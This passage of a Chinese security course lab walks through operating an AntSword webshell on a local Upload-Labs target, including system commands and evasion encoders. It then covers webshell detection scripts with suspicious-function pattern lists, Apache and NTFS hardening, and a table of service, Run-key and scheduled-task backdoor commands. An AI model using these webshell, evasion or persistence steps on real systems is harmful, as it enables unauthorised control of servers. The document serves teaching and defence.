  2. 如果连接成功,会弹出文件管理窗口,显示服务器上的目录结构
  3. 观察文件管理界面:左侧为目录树,右侧为文件列表,可以进行上传、下载、删除、重命名等操作

⚠️ 预期结果:成功连接后,可看到服务器的目录结构(如 C:\phpStudy\PHPTutorial\WWW\upload-labs\)。如果提示”连接失败”,排查以下问题:

  • phpStudy 中 Apache/MySQL 是否已启动
  • URL 地址是否正确(在浏览器中直接访问该 URL,应返回空白页面而非 404)
  • 连接密码是否与一句话木马中的参数名完全一致
  • 上传的 shell.php 是否已被 phpStudy 的安全机制拦截

第四步:执行虚拟终端命令

  1. 在目标上右键 → 虚拟终端
  2. 会弹出一个模拟的命令行终端窗口
  3. 在终端中输入命令并回车执行,结果直接显示在终端中
# 测试常用命令
whoami          # 查看当前Web服务运行身份
ipconfig        # 查看网络配置
net user        # 查看系统用户列表
dir C:\         # 列出C盘根目录
type C:\Windows\System32\drivers\etc\hosts   # 读取hosts文件

⚠️ 预期结果

  • whoami 返回 Web 服务运行用户(如 nt authority\systemdesktop-xxx\administrator),这说明 WebShell 以高权限运行,可执行系统管理操作
  • ipconfig 返回靶机的 IP 地址、子网掩码、网关等网络信息
  • net user 返回系统中所有用户账户列表

第五步:使用文件管理功能

  1. 在目标上右键 → 文件管理
  2. 导航到 C:\phpStudy\PHPTutorial\WWW\upload-labs\upload\ 目录
  3. 可执行以下操作:
    • 上传文件:右键空白处 → 上传,将本地文件上传到服务器
    • 下载文件:右键目标文件 → 下载,将服务器文件下载到本地
    • 编辑文件:双击文件 → 弹出编辑器,可在线修改文件内容
    • 新建文件/文件夹:右键 → 新建文件/新建目录

🔍 防御启示:通过以上操作可以看到,一旦 WebShell 上传成功,攻击者可以完全控制服务器——管理文件、执行命令、读取数据。因此预防 WebShell 上传(上传目录禁止脚本执行、文件类型白名单验证)远比事后检测清除更为重要。

第六步:使用编码器增强隐蔽性

蚁剑的一大特色是支持多种编码器,可以对通信数据进行编码或加密,增加流量检测的难度:

  1. 右键目标 → 编辑
  2. 在”编码器”下拉框中,可选择不同的编码方式:
    • default:默认编码(明文 Base64)
    • chr:使用 chr() 函数编码,绕过关键字过滤
    • chr16:16 进制 chr 编码
    • base64:标准 Base64 编码
  3. 选择不同的编码器后,蚁剑在发送命令时会自动对数据进行编码,服务端的 PHP 代码无需修改(编码器的工作原理是将命令”翻译”为等价的编码形式,由 PHP 原生函数还原执行)

💡 教学意义:编码器机制说明,WebShell 检测不能仅依赖简单的关键字匹配。安全团队需要结合流量行为分析、文件完整性监控、运行时防护等多种手段进行综合防御。

蚁剑常用功能一览

Section titled “蚁剑常用功能一览”
功能说明入口
文件管理上传、下载、编辑、删除服务器文件右键 → 文件管理
虚拟终端在服务器上执行系统命令右键 → 虚拟终端
数据库管理连接 MySQL/MSSQL 等数据库右键 → 数据库管理
插件市场安装扩展插件(如提权扫描、端口扫描等)主菜单 → 插件市场

🛡️ 防御建议:蚁剑等 WebShell 管理工具的存在说明,仅靠检测工具名或客户端特征无法有效防御。关键在于:

  1. 上传目录禁止脚本执行(从根本上阻断 WebShell 利用)
  2. 部署 WAF 检测异常 HTTP 请求模式
  3. 使用 D 盾等工具定期扫描 Web 目录
  4. 监控 Web 进程的异常子进程(如 Apache/Nginx 产生 cmd.exe 子进程)

实验10:WebShell检测与防御加固

Section titled “实验10:WebShell检测与防御加固”

方法一:使用PowerShell脚本检测WebShell

Section titled “方法一:使用PowerShell脚本检测WebShell”
Terminal window
# ============================================
# WebShell检测脚本
# 扫描Web目录中的可疑文件
# ============================================


$webRoot = "C:\phpStudy\PHPTutorial\WWW"  # phpStudy网站根目录
$suspiciousPatterns = @(
    'eval\s*\(',
    'base64_decode\s*\(',
    'system\s*\(',
    'exec\s*\(',
    'passthru\s*\(',
    'shell_exec\s*\(',
    'assert\s*\(',
    'preg_replace.*\/e',
    'call_user_func',
    '\$\{.*\$\{',              # PHP变量变量名
    'WScript\.Shell',          # ASP/ASPX
    'Execute\s*\(',            # ASP
    'Response\.Write.*Exec',   # ASPX
    'cmd\.exe',
    'powershell'
)


Write-Host "`n========== WebShell扫描报告 ==========" -ForegroundColor Cyan
Write-Host "扫描目录: $webRoot"
Write-Host "扫描时间: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')"


$results = @()
Get-ChildItem -Path $webRoot -Recurse -Include *.php,*.asp,*.aspx,*.jsp -ErrorAction SilentlyContinue | ForEach-Object {
    $content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
    if ($content) {
        foreach ($pattern in $suspiciousPatterns) {
            if ($content -match $pattern) {
                $results += [PSCustomObject]@{
                    FilePath = $_.FullName
                    Pattern = $pattern
                    LastModified = $_.LastWriteTime
                }
                break
            }
        }
    }
}


if ($results.Count -gt 0) {
    Write-Host "`n[警告] 发现 $($results.Count) 个可疑文件:" -ForegroundColor Red
    $results | Format-Table -AutoSize
} else {
    Write-Host "`n[通过] 未发现可疑文件" -ForegroundColor Green
}

方法二:使用D盾扫描WebShell

Section titled “方法二:使用D盾扫描WebShell”

D盾是一款免费的 WebShell 查杀工具,由国内安全开发者开发,支持对 PHP、ASP、ASPX、JSP 等多种语言的 WebShell 特征检测,是 Web 安全运维中常用的扫描工具。

操作步骤

第一步:下载并运行D盾

  1. 从 D 盾官方页面下载最新版本(绿色免安装,解压即用)
  2. 解压到任意目录,双击 D_Safe.exe 启动
  3. 界面显示”目录扫描”选项卡

第二步:扫描Web目录

  1. 在 D 盾主界面,点击”目录扫描”选项卡
  2. 在”扫描目录”输入框中填入 phpStudy 的网站根目录:C:\phpStudy\PHPTutorial\WWW\
  3. 点击 扫描 按钮,等待扫描完成
  4. 扫描完成后,D 盾会列出所有可疑文件,并标注危险等级(1~5级,数字越大越危险)

⚠️ 预期结果:实验8中上传的 shell.php 应被 D 盾识别为”一句话木马”,等级通常为4或5级。Upload-Labs 靶场自带的 include.php 等文件也可能被标记为可疑(这是正常的,因为靶场本身就包含漏洞利用代码)。

第三步:处理扫描结果

  1. 在扫描结果列表中,右键可疑文件可选择:
    • 查看文件:打开文件查看内容,人工确认是否为恶意代码
    • 删除文件:直接删除可疑文件
    • 隔离文件:将文件移动到隔离目录(不直接删除,便于后续分析)
  2. 对于确认为 WebShell 的文件(如实验8上传的 shell.php),执行删除

💡 D盾的优势:相比自行编写 PowerShell 扫描脚本,D盾内置了大量已知 WebShell 的特征库(包括各种变形和免杀变种),检测准确率更高,且支持启发式分析,能发现未知的可疑代码。

方法三:phpStudy环境WebShell防御加固

Section titled “方法三:phpStudy环境WebShell防御加固”

在 phpStudy 环境中,Web 服务器为 Apache,PHP 通过 mod_php 或 FastCGI 运行。防御加固的核心思路是:让上传目录中的文件即使被上传也无法作为 PHP 代码执行

操作1:Apache配置禁止上传目录执行PHP脚本(最关键)

通过 Apache 的 .htaccess 文件或主配置文件,可以限制特定目录不执行 PHP 脚本。这是 phpStudy 环境中最有效的防御手段。

方法一:使用 .htaccess 文件(推荐,无需修改全局配置)

  1. 在上传目录(C:\phpStudy\PHPTutorial\WWW\upload-labs\upload\)下新建文件 .htaccess
  2. 写入以下内容:
# 禁止该目录下所有PHP文件的执行
<FilesMatch "\.php$">
    Require all denied
</FilesMatch>


# 禁止执行其他脚本类型
<FilesMatch "\.(php|php5|phtml|asp|aspx|jsp)$">
    Require all denied
</FilesMatch>
  1. 保存文件。Apache 会在下次请求时自动读取 .htaccess
  2. 验证:在浏览器中访问 http://localhost/upload-labs/upload/shell.php,应返回 403 Forbidden 而非执行 PHP 代码

⚠️ 前提条件:Apache 的主配置文件中必须允许 .htaccess 覆盖。phpStudy 2018 默认已开启(AllowOverride All),如果 .htaccess 不生效,需编辑 C:\phpStudy\PHPTutorial\Apache\conf\httpd.conf,确认对应 <Directory> 块中 AllowOverride 设为 All

方法二:修改Apache虚拟主机配置(更彻底)

  1. 编辑 Apache 配置文件:C:\phpStudy\PHPTutorial\Apache\conf\extra\httpd-vhosts.conf
  2. 在对应的 <VirtualHost> 块中添加:
# 禁止upload目录执行PHP脚本
<Directory "C:/phpStudy/PHPTutorial/WWW/upload-labs/upload">
    <FilesMatch "\.php$">
        Require all denied
    </FilesMatch>
</Directory>
  1. 保存后,在 phpStudy 控制面板中重启 Apache 使配置生效

操作2:配置PHP限制上传文件类型

在 PHP 层面限制可上传的文件类型,增加一道防御线。

  1. 编辑 phpStudy 的 PHP 配置文件:C:\phpStudy\PHPTutorial\php\php-5.3.29-nts\php.ini
  2. 查找并修改以下配置项:
; 限制上传文件大小为2MB
upload_max_filesize = 2M


; 限制POST数据大小为8MB
post_max_size = 8M


; 限制每次上传的最大文件数
max_file_uploads = 5
  1. 保存后重启 Apache

💡 说明php.ini 中的 upload_max_filesize 限制了单个文件的大小上限。但 PHP 本身没有”文件类型白名单”配置项——类型验证需要在应用代码(如 Upload-Labs 的 PHP 代码)中实现。因此 php.ini 只能限制大小,真正的类型白名单需要在应用层实现。

操作3:NTFS权限限制上传目录

即使在 phpStudy 环境中,也可以通过 Windows 的 NTFS 文件系统权限限制上传目录的访问。

Terminal window
# 以管理员身份运行PowerShell


$uploadPath = "C:\phpStudy\PHPTutorial\WWW\upload-labs\upload"


# 查看当前权限
Get-Acl $uploadPath | Format-List


# 获取当前ACL
$acl = Get-Acl $uploadPath


# 移除继承(保留已继承的权限,但阻止后续继承)
$acl.SetAccessRuleProtection($true, $true)


# 仅保留读取+执行权限(禁止写入和修改)
# 注意:这会影响Upload-Labs的文件上传功能,仅用于演示防御思路
# 在实际生产环境中,应对Web服务账户和管理员分别设置不同的权限


# 为当前Web服务运行账户设置只读权限
$readRule = New-Object System.Security.AccessControl.FileSystemAccessRule(
    "Users", "ReadAndExecute", "ContainerInherit,ObjectInherit", "None", "Allow"
)
$acl.AddAccessRule($readRule)


Set-Acl $uploadPath $acl
Write-Host "上传目录权限已设置为只读" -ForegroundColor Green

⚠️ 注意:在 Upload-Labs 靶场环境中,不应对 upload 目录设置过于严格的 NTFS 权限,否则会影响靶场的文件上传功能导致实验无法进行。上述操作仅用于演示”在实际生产环境中应如何通过 NTFS 权限加固上传目录”这一思路。

操作4:定期扫描Web目录

在 phpStudy 环境中建立定期扫描机制,及时发现新增的 WebShell:

Terminal window
# ============================================
# phpStudy WebShell定时扫描脚本
# 建议通过计划任务定期执行(如每天凌晨2点)
# ============================================


$webRoot = "C:\phpStudy\PHPTutorial\WWW"
$logFile = "C:\phpStudy\PHPTutorial\WWW\scan_log.txt"
$suspiciousPatterns = @(
    'eval\s*\(', 'base64_decode\s*\(', 'system\s*\(',
    'exec\s*\(', 'passthru\s*\(', 'shell_exec\s*\(',
    'assert\s*\(', 'preg_replace.*\/e', 'call_user_func',
    '\$\{.*\$\{', 'WScript\.Shell', 'Execute\s*\(',
    'Response\.Write.*Exec', 'cmd\.exe', 'powershell'
)


$timestamp = Get-Date -Format 'yyyy-MM-dd HH:mm:ss'
$report = @()


Get-ChildItem -Path $webRoot -Recurse -Include *.php,*.asp,*.aspx,*.jsp -ErrorAction SilentlyContinue | ForEach-Object {
    $content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
    if ($content) {
        foreach ($pattern in $suspiciousPatterns) {
            if ($content -match $pattern) {
                $report += [PSCustomObject]@{
                    FilePath = $_.FullName
                    Pattern = $pattern
                    LastModified = $_.LastWriteTime
                    FileSize = "$([math]::Round($_.Length/1KB,1)) KB"
                }
                break
            }
        }
    }
}


$logEntry = "[$timestamp] 扫描完成,发现 $($report.Count) 个可疑文件`n"
if ($report.Count -gt 0) {
    $report | ForEach-Object {
        $logEntry += "  - $($_.FilePath) | 特征: $($_.Pattern) | 修改时间: $($_.LastModified)`n"
    }
}


Add-Content -Path $logFile -Value $logEntry
Write-Host $logEntry


# 输出到日志文件,便于后续审计

创建计划任务定期执行扫描

Terminal window
# 每天凌晨2点执行Web目录扫描
schtasks /create /tn "WebShellScanner" `
    /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Tools\webshell_scan.ps1" `
    /sc daily /st 02:00 /ru SYSTEM /f

🛡️ phpStudy环境防御总结

防御措施实现方式防护效果
上传目录禁止PHP执行.htaccessFilesMatch 拒绝 .php阻断WebShell利用链(最有效)
限制上传文件大小php.iniupload_max_filesize防止上传大型恶意工具
NTFS权限限制仅授予读取权限即使WebShell上传也无法写入其他文件
定期D盾扫描手动或计划任务定时扫描及时发现已上传的WebShell
PowerShell脚本扫描特征匹配 + 日志记录自动化检测,支持定期审计

📝 任务二知识点总结

Section titled “📝 任务二知识点总结”

本任务核心:任务二从 Web 应用层切入,系统讨论木马的分类体系、WebShell 的工作机制、文件上传漏洞的完整利用链,并从检测与防护两个维度建立面向 WebShell 威胁的综合应对策略。

知识点要点
WebShell本质以Web脚本形式存在的恶意程序,通过HTTP请求远程控制服务器
一句话木马核心eval类函数将字符串作为代码执行,是所有一句话木马的关键
文件上传利用链发现上传点→绕过前端→绕过后端→上传WebShell→远程控制
前端验证不安全JavaScript运行在客户端,可被绕过/禁用,安全验证必须在服务端
上传目录防护禁止脚本执行权限是最有效的WebShell防护手段(Apache .htaccess / NTFS权限限制)
现代WebShell工具冰蝎/哥斯拉使用加密通信,传统特征检测失效,需要流量行为分析
检测方法文件特征扫描+文件哈希比对+流量分析+行为检测+完整性监控
防御体系预防(白名单+权限)→ 检测(WAF+RASP)→ 响应(扫描+日志)→ 恢复(清除+加固)

📚 项目七知识点总结

Section titled “📚 项目七知识点总结”

核心操作速查表

Section titled “核心操作速查表”
操作命令/方法
创建服务后门sc create "服务名" binpath="路径" start=auto
检测可疑服务Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike "*System32*"}
删除服务后门sc stop "服务名"sc delete "服务名"
创建注册表后门reg add "HKLM\...\Run" /v "键名" /d "程序路径"
检测注册表后门Get-ItemProperty "HKLM:\...\Run"
创建计划任务后门schtasks /create /tn "任务名" /tr "程序路径" /sc onstart /ru SYSTEM
检测计划任务Get-ScheduledTask | Where-Object {$_.Author -notlike "Microsoft*"}
检测WMI后门Get-WmiObject -Namespace "root\subscription" -Class __EventFilter
检查文件篡改Get-FileHash 文件路径 -Algorithm SHA256
检查网络连接Get-NetTCPConnection -State Established
检查可疑进程Get-Process | Where-Object {$_.Path -like "*Temp*"}
上传目录禁止执行Apache .htaccess<FilesMatch "\.php$"> Require all denied </FilesMatch>
WebShell扫描D盾、河马WebShell查杀、自定义PowerShell脚本

常见错误排查表

Section titled “常见错误排查表”
问题可能原因解决方法
粘滞键后门不生效系统文件保护阻止替换需要已有SYSTEM权限或WinPE环境操作
计划任务不执行任务创建但路径不存在确认恶意程序路径正确且文件存在
WebShell上传成功但无法访问phpStudy中Apache未启动或PHP未正确解析确认Apache和MySQL状态为绿色”运行中”,检查php.ini配置
WebShell上传后返回403上传目录有执行权限限制这正是防御措施!说明安全加固有效
WMI后门删除后仍触发WMI仓库缓存重启WMI服务:Restart-Service Winmgmt
启动项删除后仍自动运行还存在其他自启动位置未清理继续排查启动文件夹、计划任务、服务和WMI订阅

安全意识

Section titled “安全意识”

攻防对抗思维

Section titled “攻防对抗思维”

核心理念:网络安全的本质并非依靠”安装杀毒软件即可”,而在于”分层布防、纵深防御”。本项目从攻击者视角揭示后门与 WebShell 的实现机制,旨在说明:唯有透彻理解攻击原理,方能构建具有针对性与有效性的防御体系。

企业环境防御最佳实践

Section titled “企业环境防御最佳实践”
防御层次措施对应威胁
终端防护部署EDR(端点检测与响应),不依赖传统特征码杀毒反弹木马、免杀后门
应用防护上传目录禁止执行、WAF检测异常请求、RASP运行时保护WebShell上传和利用
系统加固最小权限原则、定期安全扫描、文件完整性监控注册表/服务/计划任务后门
网络防护IDS/IPS、流量行为分析、出站流量控制加密WebShell通信、反弹连接
日志审计集中日志收集(SIEM)、异常行为告警WMI后门、隐蔽持久化
应急响应制定应急响应预案、定期演练、后门排查清单后门检测与清除
安全意识定期安全培训、钓鱼邮件演练、合规操作教育社会工程学攻击

免责与法律意识

Section titled “免责与法律意识”

法律红线:在中国,《网络安全法》《刑法》第285条(非法侵入计算机信息系统罪)和第286条(破坏计算机信息系统罪)明确规定,未经授权对计算机信息系统实施渗透测试、植入后门、上传WebShell等行为属于违法犯罪,最高可处七年有期徒刑。

合法授权是底线:即使是安全研究人员,也必须在取得书面授权后才能进行渗透测试。教学实验环境(如虚拟机靶场)是学习这些技术的唯一合法场景。

课堂思考

Section titled “课堂思考”

  1. 后门检测:相较于注册表后门,为何 WMI 事件订阅后门更难被发现?作为安全运维人员,应如何建立 WMI 后门的常态化排查机制?

  2. WebShell 防护:在 phpStudy + Apache 环境中,通过 .htaccess 禁止上传目录执行 PHP 脚本与在 PHP 代码中通过扩展名黑名单拒绝 .php 文件上传,哪种方式防护更有效?请从防御层次和绕过难度两个角度进行论证。

  3. 攻防对抗:传统杀毒软件难以有效检测冰蝎(Behinder)等加密 WebShell 的原因是什么?现代 EDR 相对于传统杀软提供了哪些技术演进?

  4. 应急响应:假设你是一台 Windows 服务器的安全管理员,发现 CPU 占用率异常升高且存在未知的对外网络连接。请按时间轴列出完整的排查步骤与应急处置流程。

  5. 纵深防御:综合本项目所学的后门技术与 WebShell 利用方法,请为一台运行 phpStudy(Apache + PHP + MySQL)的 Windows Web 服务器设计完整的安全防护方案,并按优先级排序各项措施。

知识关联

Section titled “知识关联”

本项目与前序项目的知识关联如下:

关联项目关联内容
项目四·IIS 网站管理IIS 与 phpStudy/Apache 均可作为 WebShell 攻击的载体。项目四所介绍的安全加固思路(请求筛选、权限控制、日志审计)同样适用于 Apache 环境的防御
项目四·上传目录权限”上传目录禁止脚本执行权限”是抵御 WebShell 最有效的单一措施——在 IIS 中通过处理程序映射取消”脚本”权限,在 Apache 中通过 .htaccess 拒绝 .php 文件执行,原理相通
项目二·用户管理弱口令、高权限账户与不规范的授权策略,是后门植入与 WebShell 利用后实施权限扩张的常见基础
项目六·域管理域控制器一旦失陷,攻击者可借助组策略(GPO)批量分发后门,威胁波及全域计算机;保护域控即保护整个域
项目四·纵深防御本项目所阐述的后门检测与 WebShell 防御完全遵循纵深防御原则——不依赖任何单一手段,强调多层防护的协同与互补

MITRE ATT&CK 框架映射

Section titled “MITRE ATT&CK 框架映射”

本项目涉及的攻击技术在 MITRE ATT&CK 框架中的对应关系:

本项目技术ATT&CK战术ATT&CK技术ID
注册表Run键后门持久化(Persistence)T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
计划任务后门持久化(Persistence)T1053.005 - Scheduled Task
服务后门持久化(Persistence)T1543.003 - Windows Service
WMI事件订阅持久化(Persistence)T1546.003 - Windows Management Instrumentation Event Subscription
DLL劫持持久化/权限提升T1574.001 - DLL Search Order Hijacking
粘滞键后门持久化/防御规避T1546.008 - Accessibility Features
WebShell持久化/初始访问T1505.003 - Server Software Component: Web Shell